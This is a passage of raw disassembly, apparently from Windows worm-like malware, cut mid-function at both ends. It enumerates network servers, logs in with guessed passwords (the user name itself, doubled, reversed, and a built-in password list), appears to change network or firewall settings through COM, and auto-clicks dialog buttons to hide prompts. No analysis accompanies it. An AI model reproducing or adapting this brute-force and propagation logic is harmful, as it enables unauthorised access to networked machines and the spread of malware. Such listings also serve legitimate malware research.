push [esp+110h+lpWideCharStr] ; lpWideCharStr
call sub_9A96C2
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jnz loc_9A9883
push [esp+108h+lpWideCharStr] ; servername
call sub_9A95EE
test eax, eax
pop ecx
mov [esp+108h+Memory], eax
jnz short loc_9A974A
push eax ; servername
call sub_9A95EE
test eax, eax
pop ecx
mov [esp+108h+Memory], eax
jz loc_9A9883
loc_9A974A: ; CODE XREF: sub_9A96FE+37�j
push ebp
mov ebp, wcslen
push esi
mov esi, [esp+110h+Memory]
push edi
loc_9A9757: ; CODE XREF: sub_9A96FE+171�j
cmp dword ptr [esi], 0
jz loc_9A9875
mov eax, [esi]
push eax ; lpPassword
push eax ; lpUserName
push [esp+11Ch+lpWideCharStr] ; lpWideCharStr
call sub_9A96C2
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jnz loc_9A9861
push dword ptr [esi] ; Str
call ebp ; wcslen
test eax, eax
pop ecx
jz loc_9A9818
push dword ptr [esi] ; Str
call ebp ; wcslen
lea eax, ds:2[eax*4]
push eax ; Size
call malloc
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_9A9818
push dword ptr [esi] ; Source
push edi ; Dest
call wcscpy
push dword ptr [esi] ; Source
push edi ; Dest
call wcscat
push edi ; lpPassword
push dword ptr [esi] ; lpUserName
push [esp+12Ch+lpWideCharStr] ; lpWideCharStr
call sub_9A96C2
mov ebx, eax
add esp, 1Ch
test ebx, ebx
jnz short loc_9A980C
push dword ptr [esi] ; Str
call ebp ; wcslen
test eax, eax
pop ecx
jle short loc_9A97F3
loc_9A97D7: ; CODE XREF: sub_9A96FE+F3�j
push dword ptr [esi] ; Str
call ebp ; wcslen
mov ecx, [esi]
sub eax, ebx
mov ax, [ecx+eax*2-2]
mov [edi+ebx*2], ax
push dword ptr [esi] ; Str
inc ebx
call ebp ; wcslen
cmp ebx, eax
pop ecx
pop ecx
jl short loc_9A97D7
loc_9A97F3: ; CODE XREF: sub_9A96FE+D7�j
and word ptr [edi+ebx*2], 0
push edi ; lpPassword
push dword ptr [esi] ; lpUserName
push [esp+11Ch+lpWideCharStr] ; lpWideCharStr
call sub_9A96C2
add esp, 0Ch
mov ebx, eax
loc_9A980C: ; CODE XREF: sub_9A96FE+CE�j
push edi ; Memory
call free
test ebx, ebx
pop ecx
jnz short loc_9A9861
loc_9A9818: ; CODE XREF: sub_9A96FE+86�j
; sub_9A96FE+A4�j
xor edi, edi
loc_9A981A: ; CODE XREF: sub_9A96FE+161�j
cmp edi, 3E4h
jnb short loc_9A9861
push 80h ; cchWideChar
lea eax, [esp+118h+Password]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push off_9BA010[edi] ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call MultiByteToWideChar
test eax, eax
jz short loc_9A985A
lea eax, [esp+114h+Password]
push eax ; lpPassword
push dword ptr [esi] ; lpUserName
push [esp+11Ch+lpWideCharStr] ; lpWideCharStr
call sub_9A96C2
add esp, 0Ch
mov ebx, eax
loc_9A985A: ; CODE XREF: sub_9A96FE+142�j
add edi, 4
test ebx, ebx
jz short loc_9A981A
loc_9A9861: ; CODE XREF: sub_9A96FE+79�j
; sub_9A96FE+118�j ...
push dword ptr [esi] ; Memory
call free
add esi, 4
test ebx, ebx
pop ecx
jz loc_9A9757
loc_9A9875: ; CODE XREF: sub_9A96FE+5C�j
push [esp+114h+Memory] ; Memory
call free
pop ecx
pop edi
pop esi
pop ebp
loc_9A9883: ; CODE XREF: sub_9A96FE+1E�j
; sub_9A96FE+46�j
push 7D0h ; dwMilliseconds
call Sleep
mov eax, ebx
pop ebx
add esp, 104h
retn
sub_9A96FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9898 proc near ; CODE XREF: sub_9A99AE+16�p
totalentries = dword ptr -10h
var_C = dword ptr -0Ch
entriesread = dword ptr -8
Buffer = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push edi
xor edi, edi
push edi ; resume_handle
push edi ; domain
push 0FFFFFFFFh ; servertype
lea eax, [ebp+totalentries]
push eax ; totalentries
lea eax, [ebp+entriesread]
push eax ; entriesread
push 0FFFFFFFFh ; prefmaxlen
lea eax, [ebp+Buffer]
push eax ; bufptr
push 65h ; level
push edi ; servername
mov [ebp+var_C], edi
mov [ebp+entriesread], edi
mov [ebp+Buffer], edi
call NetServerEnum
cmp eax, edi
jz short loc_9A98D9
cmp eax, 0EAh
jnz short loc_9A9928
cmp [ebp+Buffer], edi
jz short loc_9A9935
cmp [ebp+entriesread], edi
jz short loc_9A9928
loc_9A98D9: ; CODE XREF: sub_9A9898+2E�j
push ebx
xor ebx, ebx
cmp [ebp+entriesread], edi
jbe short loc_9A9927
push esi
xor esi, esi
loc_9A98E4: ; CODE XREF: sub_9A9898+8C�j
mov eax, [ebp+Buffer]
add eax, esi
test byte ptr [eax+11h], 10h
jz short loc_9A991D
cmp dword ptr [eax+8], 4
jbe short loc_9A991D
push offset word_9BAF80 ; Str2
push dword ptr [eax+4] ; Str1
call wcscmp
test eax, eax
pop ecx
pop ecx
jz short loc_9A991D
mov eax, [ebp+Buffer]
push dword ptr [esi+eax+4] ; lpWideCharStr
call sub_9A96FE
pop ecx
mov [ebp+var_C], 1
loc_9A991D: ; CODE XREF: sub_9A9898+55�j
; sub_9A9898+5B�j ...
inc ebx
add esi, 18h
cmp ebx, [ebp+entriesread]
jb short loc_9A98E4
pop esi
loc_9A9927: ; CODE XREF: sub_9A9898+47�j
pop ebx
loc_9A9928: ; CODE XREF: sub_9A9898+35�j
; sub_9A9898+3F�j
cmp [ebp+Buffer], edi
jz short loc_9A9935
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_9A9935: ; CODE XREF: sub_9A9898+3A�j
; sub_9A9898+93�j
mov eax, [ebp+var_C]
pop edi
leave
retn
sub_9A9898 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A993B proc near ; CODE XREF: sub_9A99AE+F�p
nSize = dword ptr -8
Buffer = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push edi
call sub_9AD417
mov edi, eax
call sub_9AC50B
and [ebp+Buffer], 0
lea eax, [ebp+Buffer]
push eax ; bufptr
push 64h ; level
push 0 ; servername
call NetWkstaGetInfo
test eax, eax
jnz short loc_9A9985
mov eax, [ebp+Buffer]
push 104h ; Count
push dword ptr [eax+4] ; Source
push offset word_9BAF80 ; Dest
call wcsncpy
add esp, 0Ch
and word_9BB186, 0
jmp short loc_9A999B
; ---------------------------------------------------------------------------
loc_9A9985: ; CODE XREF: sub_9A993B+25�j
lea eax, [ebp+nSize]
push eax ; nSize
push offset word_9BAF80 ; lpBuffer
mov [ebp+nSize], 104h
call GetComputerNameW
loc_9A999B: ; CODE XREF: sub_9A993B+48�j
cmp [ebp+Buffer], 0
jz short loc_9A99A9
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_9A99A9: ; CODE XREF: sub_9A993B+64�j
mov eax, edi
pop edi
leave
retn
sub_9A993B endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_9A99AE(LPVOID)
sub_9A99AE proc near ; DATA XREF: sub_9A99DA+9�o
push esi
mov esi, Sleep
push edi
push 493E0h ; dwMilliseconds
loc_9A99BB: ; CODE XREF: sub_9A99AE+2A�j
call esi ; Sleep
call sub_9A993B
mov edi, eax
call sub_9A9898
test edi, edi
jz short loc_9A99D3
call RevertToSelf
loc_9A99D3: ; CODE XREF: sub_9A99AE+1D�j
push 249F00h
jmp short loc_9A99BB
sub_9A99AE endp
; =============== S U B R O U T I N E =======================================
sub_9A99DA proc near ; CODE XREF: StartAddress+1A8�p
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push eax ; lpThreadId
xor eax, eax
push eax ; dwCreationFlags
push eax ; lpParameter
push offset sub_9A99AE ; lpStartAddress
push eax ; dwStackSize
push eax ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
pop ecx
retn
sub_9A99DA endp
; =============== S U B R O U T I N E =======================================
; BOOL __stdcall fn(HWND,LPARAM)
fn proc near ; DATA XREF: sub_9A9A29+15�o
hDlg = dword ptr 4
push 1 ; nIDDlgItem
push [esp+4+hDlg] ; hDlg
call GetDlgItem
test eax, eax
jz short loc_9A9A23
push 0 ; lParam
push 0 ; wParam
push 0F5h ; Msg
push eax ; hWnd
call PostMessageA
mov dword_9BB188, 1
loc_9A9A23: ; CODE XREF: fn+E�j
xor eax, eax
inc eax
retn 8
fn endp
; =============== S U B R O U T I N E =======================================
; DWORD __stdcall sub_9A9A29(LPVOID)
sub_9A9A29 proc near ; DATA XREF: sub_9A9A64+127�o
dwThreadId = dword ptr 4
and dword_9BB188, 0
push esi
xor esi, esi
loc_9A9A33: ; CODE XREF: sub_9A9A29+33�j
cmp dword_9BB188, 0
jnz short loc_9A9A5E
push 0 ; lParam
push offset fn ; lpfn
push [esp+0Ch+dwThreadId] ; dwThreadId
call EnumThreadWindows
push 0Ah ; dwMilliseconds
call Sleep
inc esi
cmp esi, 5DCh
jl short loc_9A9A33
loc_9A9A5E: ; CODE XREF: sub_9A9A29+11�j
xor eax, eax
pop esi
retn 4
sub_9A9A29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9A64 proc near ; CODE XREF: sub_9A9C0D+5E�p
pvarg = VARIANTARG ptr -38h
ThreadId = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 38h
mov eax, [ebx]
push esi
lea ecx, [ebp+var_1C]
push ecx
xor esi, esi
push ebx
mov [ebp+var_1C], esi
call dword ptr [eax+2Ch]
mov eax, [ebp+var_1C]
cmp eax, esi
jz loc_9A9C0A
lea edx, [ebp+var_14]
push edx
mov [ebp+var_8], esi
mov [ebp+var_14], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+1Ch]
mov eax, [ebp+var_14]
cmp eax, esi
jz short loc_9A9AB3
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push offset dword_9A2F70
push eax
call dword ptr [ecx]
mov eax, [ebp+var_14]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9AB3: ; CODE XREF: sub_9A9A64+36�j
cmp [ebp+var_8], esi
jz loc_9A9C01
lea eax, [ebp+pvarg]
push eax ; pvarg
call VariantInit
mov eax, [ebp+var_8]
mov ecx, [eax]
push esi
lea edx, [ebp+pvarg]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_9A9BF8
push edi
loc_9A9ADF: ; CODE XREF: sub_9A9A64+18D�j
cmp word ptr [ebp+pvarg.anonymous_0], 0Dh
jnz loc_9A9BD5
mov eax, dword ptr [ebp+pvarg.anonymous_0+8]
lea edx, [ebp+var_4]
push edx
push offset dword_9A2F60
mov [ebp+var_4], esi
mov ecx, [eax]
push eax
call dword ptr [ecx]
cmp [ebp+var_4], esi
jz loc_9A9BD5
mov eax, [ebx]
lea ecx, [ebp+var_10]
push ecx
push [ebp+var_4]
mov [ebp+var_10], esi
push ebx
call dword ptr [eax+30h]
mov eax, [ebp+var_10]
cmp eax, esi
jz loc_9A9BCC
lea edx, [ebp+var_20]
push edx
mov [ebp+var_20], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
test byte ptr [ebp+var_20+1], 4
jz loc_9A9BC3
mov eax, [ebp+var_10]
lea edx, [ebp+var_18]
push edx
mov [ebp+var_18], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+2Ch]
cmp [ebp+var_18], 8
jz short loc_9A9BC3
cmp [ebp+var_18], 9
jz short loc_9A9BC3
mov eax, [ebx]
lea ecx, [ebp+var_C]
push ecx
push [ebp+var_4]
mov [ebp+var_C], esi
push ebx
call dword ptr [eax+28h]
mov eax, [ebp+var_C]
cmp eax, esi
jz short loc_9A9BC3
lea edx, [ebp+var_24]
push edx
mov [ebp+var_24], esi
mov ecx, [eax]
push eax
call dword ptr [ecx+2Ch]
cmp word ptr [ebp+var_24], si
jz short loc_9A9BBA
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push esi ; dwCreationFlags
call GetCurrentThreadId
push eax ; lpParameter
push offset sub_9A9A29 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread
push 64h ; dwMilliseconds
mov edi, eax
call Sleep
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
push esi ; dwExitCode
push edi ; hThread
call TerminateThread
push edi ; hObject
call CloseHandle
loc_9A9BBA: ; CODE XREF: sub_9A9A64+119�j
mov eax, [ebp+var_C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9BC3: ; CODE XREF: sub_9A9A64+CF�j
; sub_9A9A64+E9�j ...
mov eax, [ebp+var_10]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9BCC: ; CODE XREF: sub_9A9A64+B8�j
mov eax, [ebp+var_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9BD5: ; CODE XREF: sub_9A9A64+80�j
; sub_9A9A64+9D�j
lea eax, [ebp+pvarg]
push eax ; pvarg
call VariantClear
mov eax, [ebp+var_8]
mov ecx, [eax]
push esi
lea edx, [ebp+pvarg]
push edx
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jz loc_9A9ADF
pop edi
loc_9A9BF8: ; CODE XREF: sub_9A9A64+74�j
mov eax, [ebp+var_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9C01: ; CODE XREF: sub_9A9A64+52�j
mov eax, [ebp+var_1C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9C0A: ; CODE XREF: sub_9A9A64+1B�j
pop esi
leave
retn
sub_9A9A64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9A9C0D(LPVOID)
sub_9A9C0D proc near ; DATA XREF: sub_9A9CA1+50�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
ppv = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 14h
push offset stru_9A2FA0
call __SEH_prolog
push 6 ; dwCoInit
xor esi, esi
push esi ; pvReserved
call CoInitializeEx
mov [ebp+var_20], eax
cmp eax, 80010106h
jz short loc_9A9C32
cmp eax, esi
jl short loc_9A9C8C
loc_9A9C32: ; CODE XREF: sub_9A9C0D+1F�j
push esi ; pReserved3
push esi ; dwCapabilities
push esi ; pAuthList
push 3 ; dwImpLevel
push 4 ; dwAuthnLevel
push esi ; pReserved1
push esi ; asAuthSvc
push 0FFFFFFFFh ; cAuthSvc
push esi ; pSecDesc
call CoInitializeSecurity
mov [ebp+ms_exc.disabled], esi
mov [ebp+ppv], esi
lea eax, [ebp+ppv]
push eax ; ppv
push offset riid ; riid
push 17h ; dwClsContext
push esi ; pUnkOuter
push offset rclsid ; rclsid
call CoCreateInstance
mov [ebp+var_24], eax
mov ebx, [ebp+ppv]
cmp ebx, esi
jz short loc_9A9C79
call sub_9A9A64
mov eax, [ebp+ppv]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9C79: ; CODE XREF: sub_9A9C0D+5C�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9A9C8C
; ---------------------------------------------------------------------------
loc_9A9C7F: ; DATA XREF: .text:stru_9A2FA0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9C83: ; DATA XREF: .text:stru_9A2FA0�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor esi, esi
loc_9A9C8C: ; CODE XREF: sub_9A9C0D+23�j
; sub_9A9C0D+70�j
cmp [ebp+var_20], esi
jl short loc_9A9C97
call CoUninitialize
loc_9A9C97: ; CODE XREF: sub_9A9C0D+82�j
xor eax, eax
call __SEH_epilog
retn 4
sub_9A9C0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A9CA1 proc near ; CODE XREF: sub_9AFC25+6B�p
VersionInformation= _OSVERSIONINFOA ptr -0A0h
var_C = word ptr -0Ch
ThreadId = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 0A0h
push edi
push 26h
pop ecx
xor eax, eax
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
lea edi, [ebp+78h+VersionInformation.dwMajorVersion]
rep stosd
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
call GetVersionExA
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jnz short loc_9A9D23
cmp [ebp+78h+VersionInformation.dwMinorVersion], 1
jnz short loc_9A9CDB
cmp [ebp+78h+var_C], 2
jb short loc_9A9CE8
loc_9A9CDB: ; CODE XREF: sub_9A9CA1+31�j
cmp [ebp+78h+VersionInformation.dwMinorVersion], 2
jnz short loc_9A9D23
cmp [ebp+78h+var_C], 1
jnb short loc_9A9D23
loc_9A9CE8: ; CODE XREF: sub_9A9CA1+38�j
push esi
lea eax, [ebp+78h+ThreadId]
push eax ; lpThreadId
xor esi, esi
push esi ; dwCreationFlags
push esi ; lpParameter
push offset sub_9A9C0D ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread
mov edi, eax
push 3A98h ; dwMilliseconds
push edi ; hHandle
call WaitForSingleObject
cmp eax, 102h
jnz short loc_9A9D1B
push esi ; dwExitCode
push edi ; hThread
call TerminateThread
loc_9A9D1B: ; CODE XREF: sub_9A9CA1+70�j
push edi ; hObject
call CloseHandle
pop esi
loc_9A9D23: ; CODE XREF: sub_9A9CA1+2B�j
; sub_9A9CA1+3E�j ...
pop edi
add ebp, 78h
leave
retn
sub_9A9CA1 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A9D29(char *lpFirst)
sub_9A9D29 proc near ; CODE XREF: sub_9AAE1D+1C�p
; sub_9AAE90+64�p ...
lpFirst = dword ptr 4
push ebx
mov ebx, [esp+4+lpFirst]
push ebp
push edi
push 2Eh ; Ch
push ebx ; Str
xor ebp, ebp
call strrchr
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_9A9DA0
push esi
xor esi, esi
loc_9A9D46: ; CODE XREF: sub_9A9D29+37�j
push off_9BA3F8[esi] ; lpSrch
push ebx ; lpFirst
call StrStrIA
test eax, eax
jnz short loc_9A9D9C
add esi, 4
cmp esi, 0D0h
jb short loc_9A9D46
jmp short loc_9A9D6E
; ---------------------------------------------------------------------------
loc_9A9D64: ; CODE XREF: sub_9A9D29+47�j
lea eax, [edi-1]
cmp byte ptr [eax], 2Eh
jz short loc_9A9D72
mov edi, eax
loc_9A9D6E: ; CODE XREF: sub_9A9D29+39�j
cmp edi, ebx
ja short loc_9A9D64
loc_9A9D72: ; CODE XREF: sub_9A9D29+41�j
xor ebx, ebx
loc_9A9D74: ; CODE XREF: sub_9A9D29+6F�j
lea esi, off_9BA4C8[ebx]
push dword ptr [esi] ; Str
call strlen
push eax ; MaxCount
push dword ptr [esi] ; Str
push edi ; Str1
call _strnicmp
add esp, 10h
test eax, eax
jz short loc_9A9D9C
add ebx, 4
cmp ebx, 20h
jb short loc_9A9D74
jmp short loc_9A9D9F
; ---------------------------------------------------------------------------
loc_9A9D9C: ; CODE XREF: sub_9A9D29+2C�j
; sub_9A9D29+67�j
xor ebp, ebp
inc ebp
loc_9A9D9F: ; CODE XREF: sub_9A9D29+71�j
pop esi
loc_9A9DA0: ; CODE XREF: sub_9A9D29+18�j
pop edi
mov eax, ebp
pop ebp
pop ebx
retn
sub_9A9D29 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A9DA6(u_long netlong)
sub_9A9DA6 proc near ; CODE XREF: sub_9AABAE+42�p
; sub_9AF7D5+1B4�p
netlong = dword ptr 4
push esi
push [esp+4+netlong]
xor esi, esi
call sub_9AC384
test eax, eax
pop ecx
jz short loc_9A9DE3
push [esp+4+netlong] ; netlong
call __imp_ntohl
xor ecx, ecx
loc_9A9DC3: ; CODE XREF: sub_9A9DA6+36�j
cmp eax, dword_9A2FB0[ecx]
jb short loc_9A9DD3
cmp eax, dword_9A2FB4[ecx]
jbe short loc_9A9DE0
loc_9A9DD3: ; CODE XREF: sub_9A9DA6+23�j
add ecx, 8
cmp ecx, 0C60h
jb short loc_9A9DC3
jmp short loc_9A9DE3
; ---------------------------------------------------------------------------
loc_9A9DE0: ; CODE XREF: sub_9A9DA6+2B�j
xor esi, esi
inc esi
loc_9A9DE3: ; CODE XREF: sub_9A9DA6+F�j
; sub_9A9DA6+38�j
mov eax, esi
pop esi
retn
sub_9A9DA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9DE7 proc near ; CODE XREF: sub_9A9FDF+28�p
ppv = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+ppv], 0
and [ebp+var_4], 0
and dword ptr [edi], 0
push esi
lea eax, [ebp+ppv]
push eax ; ppv
push offset stru_9A3E74 ; riid
push 1 ; dwClsContext
push 0 ; pUnkOuter
push offset stru_9A3E64 ; rclsid
call CoCreateInstance
mov esi, eax
test esi, esi
jl short loc_9A9E35
mov eax, [ebp+ppv]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+1Ch]
mov esi, eax
test esi, esi
jl short loc_9A9E35
mov eax, [ebp+var_4]
mov ecx, [eax]
push edi
push eax
call dword ptr [ecx+1Ch]
mov esi, eax
loc_9A9E35: ; CODE XREF: sub_9A9DE7+2D�j
; sub_9A9DE7+40�j
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9A9E42
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9E42: ; CODE XREF: sub_9A9DE7+53�j
mov eax, [ebp+ppv]
test eax, eax
jz short loc_9A9E4F
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9E4F: ; CODE XREF: sub_9A9DE7+60�j
mov eax, esi
pop esi
leave
retn
sub_9A9DE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9E54 proc near ; CODE XREF: sub_9A9ED0+3C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
and dword ptr [esi], 0
mov ecx, [eax]
and [ebp+var_8], 0
and [ebp+var_C], 0
push ebx
lea edx, [ebp+var_C]
push edx
push eax
call dword ptr [ecx+48h]
mov ebx, eax
test ebx, ebx
jl short loc_9A9EB1
mov eax, [ebp+var_C]
mov ecx, [eax]
lea edx, [ebp+var_8]
push edx
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call dword ptr [ecx+28h]
test eax, eax
jl short loc_9A9EAF
mov eax, [ebp+var_8]
mov ecx, [eax]
lea edx, [ebp+var_4]
push edx
push eax
call dword ptr [ecx+4Ch]
mov ebx, eax
test ebx, ebx
jl short loc_9A9EB1
cmp [ebp+var_4], 0
jz short loc_9A9EB1
mov dword ptr [esi], 1
jmp short loc_9A9EB1
; ---------------------------------------------------------------------------
loc_9A9EAF: ; CODE XREF: sub_9A9E54+37�j
xor ebx, ebx
loc_9A9EB1: ; CODE XREF: sub_9A9E54+20�j
; sub_9A9E54+4A�j ...
mov eax, [ebp+var_8]
test eax, eax
jz short loc_9A9EBE
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9EBE: ; CODE XREF: sub_9A9E54+62�j
mov eax, [ebp+var_C]
test eax, eax
jz short loc_9A9ECB
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9ECB: ; CODE XREF: sub_9A9E54+6F�j
mov eax, ebx
pop ebx
leave
retn
sub_9A9E54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9ED0(int,int,OLECHAR *psz)
sub_9A9ED0 proc near ; CODE XREF: sub_9A9FDF+59�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
ppv = dword ptr -8
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
psz = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
lea ecx, [ebp+var_4]
mov edi, eax
mov eax, [edi]
xor ebx, ebx
push ecx
push edi
mov [ebp+var_14], ebx
mov [ebp+ppv], ebx
mov [ebp+var_C], ebx
call dword ptr [eax+28h]
test eax, eax
jl short loc_9A9F01
cmp [ebp+var_4], bx
jz short loc_9A9F01
mov eax, [edi]
push ebx
push edi
call dword ptr [eax+2Ch]
loc_9A9F01: ; CODE XREF: sub_9A9ED0+22�j
; sub_9A9ED0+28�j
push [ebp+arg_4]
lea esi, [ebp+var_10]
push [ebp+arg_0]
mov eax, edi
call sub_9A9E54
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jl loc_9A9FB4
cmp [ebp+var_10], ebx
jnz loc_9A9FB4
mov eax, [edi]
lea ecx, [ebp+var_C]
push ecx
push edi
call dword ptr [eax+48h]
mov esi, eax
cmp esi, ebx
jl short loc_9A9FB4
lea eax, [ebp+ppv]
push eax ; ppv
push offset stru_9A3E94 ; riid
push 1 ; dwClsContext
push ebx ; pUnkOuter
push offset stru_9A3E84 ; rclsid
call CoCreateInstance
mov esi, eax
cmp esi, ebx
jl short loc_9A9FB4
mov eax, [ebp+ppv]
push [ebp+arg_0]
mov ecx, [eax]
push eax
call dword ptr [ecx+38h]
mov esi, eax
cmp esi, ebx
jl short loc_9A9FB4
mov eax, [ebp+ppv]
push [ebp+arg_4]
mov ecx, [eax]
push eax
call dword ptr [ecx+30h]
mov esi, eax
cmp esi, ebx
jl short loc_9A9FB4
push [ebp+psz] ; psz
call SysAllocString
mov edi, eax
push edi ; BSTR
call SysStringLen
test eax, eax
jnz short loc_9A9F94
mov esi, 8007000Eh
jmp short loc_9A9FB7
; ---------------------------------------------------------------------------
loc_9A9F94: ; CODE XREF: sub_9A9ED0+BB�j
mov eax, [ebp+ppv]
mov ecx, [eax]
push edi
push eax
call dword ptr [ecx+20h]
mov esi, eax
cmp esi, ebx
jl short loc_9A9FB7
mov eax, [ebp+var_C]
push [ebp+ppv]
mov ecx, [eax]
push eax
call dword ptr [ecx+20h]
mov esi, eax
jmp short loc_9A9FB7
; ---------------------------------------------------------------------------
loc_9A9FB4: ; CODE XREF: sub_9A9ED0+47�j
; sub_9A9ED0+50�j ...
mov edi, [ebp+var_14]
loc_9A9FB7: ; CODE XREF: sub_9A9ED0+C2�j
; sub_9A9ED0+D2�j ...
push edi ; bstrString
call SysFreeString
mov eax, [ebp+ppv]
cmp eax, ebx
jz short loc_9A9FCB
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9FCB: ; CODE XREF: sub_9A9ED0+F3�j
mov eax, [ebp+var_C]
cmp eax, ebx
jz short loc_9A9FD8
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9A9FD8: ; CODE XREF: sub_9A9ED0+100�j
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_9A9ED0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9FDF proc near ; CODE XREF: sub_9AFC25+59�p
psz = word ptr -18h
var_4 = dword ptr -4
arg_0 = word ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
xor ebx, ebx
push 6 ; dwCoInit
push ebx ; pvReserved
mov [ebp+var_4], ebx
call CoInitializeEx
mov esi, eax
cmp esi, 80010106h
jz short loc_9AA003
cmp esi, ebx
jl short loc_9AA047
loc_9AA003: ; CODE XREF: sub_9A9FDF+1E�j
push edi
lea edi, [ebp+var_4]
call sub_9A9DE7
test eax, eax
pop edi
jl short loc_9AA047
call rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+psz]
add edx, 5
push edx
push eax
call sub_9AC672
lea eax, [ebp+psz]
push eax ; psz
movzx eax, [ebp+arg_0]
push 6 ; int
push eax ; int
mov eax, [ebp+var_4]
call sub_9A9ED0
add esp, 14h
test eax, eax
jl short loc_9AA047
xor ebx, ebx
inc ebx
loc_9AA047: ; CODE XREF: sub_9A9FDF+22�j
; sub_9A9FDF+30�j ...
mov eax, [ebp+var_4]
test eax, eax
jz short loc_9AA054
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_9AA054: ; CODE XREF: sub_9A9FDF+6D�j
test esi, esi
jl short loc_9AA05E
call CoUninitialize
loc_9AA05E: ; CODE XREF: sub_9A9FDF+77�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9A9FDF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA064 proc near ; CODE XREF: sub_9AA320+69�p
Str = byte ptr -104h
var_103 = byte ptr -103h
nSize = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
push 3Fh
pop ecx
xor eax, eax
mov [ebp+Str], 0
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
mov esi, 100h
push esi ; namelen
lea eax, [ebp+Str]
push eax ; name
call gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_9AA0B2
lea eax, [ebp+nSize]
push eax ; nSize
lea eax, [ebp+Str]
push eax ; lpBuffer
mov [ebp+nSize], esi
call GetComputerNameA
loc_9AA0B2: ; CODE XREF: sub_9AA064+38�j
